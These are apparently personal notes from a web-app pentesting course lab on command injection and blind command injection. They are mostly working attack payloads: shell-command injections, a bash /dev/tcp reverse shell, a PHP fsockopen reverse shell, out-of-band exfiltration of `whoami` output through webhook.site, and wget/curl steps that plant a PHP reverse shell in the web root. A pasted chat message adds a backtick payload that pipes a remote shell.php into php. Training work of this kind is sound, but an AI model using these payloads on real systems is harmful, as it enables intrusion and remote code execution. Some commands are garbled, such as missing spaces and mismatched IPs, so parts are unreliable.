Search

Command Injection

Command injection - AppSecExplained (gitbook.io)

Eval is EVIL

PHP interactive mode:

php -a
$userInput = 'whoami';
system($userInput);

never trust the input coming from the user or from the system via API.

Avoid using Eval and System!

__________________________________________________________________________________________________________

image
curl -I -s -L https://tcm-sec.com | grep "HTTP/"

Can we inject whoami?

https://tcm-sec.com; whoami
Command: curl -I -s -L https://tcm-sec.com; whoami | grep "HTTP/"

It runs but grep gets rid of whoami. How do we mess up grep with “HTTP/”?

https://tcm-sec.com; whoami; echo HTTP/

How do we clean the output?

; whoami; echo HTTP/

Get rid of the link

; whoami; asd

and make the grep fail

output:

image

commands to run:

; ls -lah; asd

CTRL + U to view the source and see it in a good format\

Pop a reverse shell?

; which bash; asd

To get where bash is

; /bin/bash -i >& /dev/tcp/192.168.218.128/6969 0>&1

Doesn’t give us anything back.

PHP?

; /usr/local/bin/php -r '$sock=fsockopen("192.168.218.128",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
image

suck cess

hostname
ls -lah

__________________________________________________________________________________________________________

Blind Command Injection:

Out of band

https://webhook.site/18f6cb92-c2fa-4f63-a984-6f0790c81f01?`whoami`
image

New line:

Run listener on python

python3 -m http.server 8080
https://tcm-sec.com \n wget 192.168.218.128:8080/test
image

Can we get a shell?

https://tcm-sec.com \n ssh 192.168.218.128:8080/test

When special characters are getting filtered, you can upload file and force to run it:

cd /tmp
cp /usr/share/webshells/laudanum/php/php-reverse-shell.php
mv php-reverse-shell.php rev.php

edit rev.php to match Kali IP and SHELL port

In new terminal:

cd /tmp
python3 -m http.server 8080 #run server to get the file

on the website:

https://tcm-sec.com \n wget 192.168.218.128:8080/rev.php

in firefox:

localhost/rev.php
OR
localhost/labs/rev.php

If that doesn’t work, you can add &’s and curl >:

https://tcm-sec.com && curl 192.168.218.128:8080/rev.php > /var/www/html/rev.php

Also:

Hey @strider_gearhead and @imhasin - I was able to get the command injection 0x02 to work. Admittedly it's a wee bit hacky but this is how I did it - 1. Modify the reverse shell as required (like host and port) and host it using Python or another method (I used port 9090 to do so with updog) 1. Start another listener on port 443 to act as the "out of band" server 1. Use the following URL in the lab page to trigger the shell -

http://172.17.0.1:443?'curl172.17.0.1:9090/shell.php | php' - You should be using back ticks rather than single quotes but Discord Markdown didn't like it. @July 23, 2023 10:25 AM (EDT)

http://198.168.218.128:443?`curl172.17.0.1:9090/shell.php | php`
image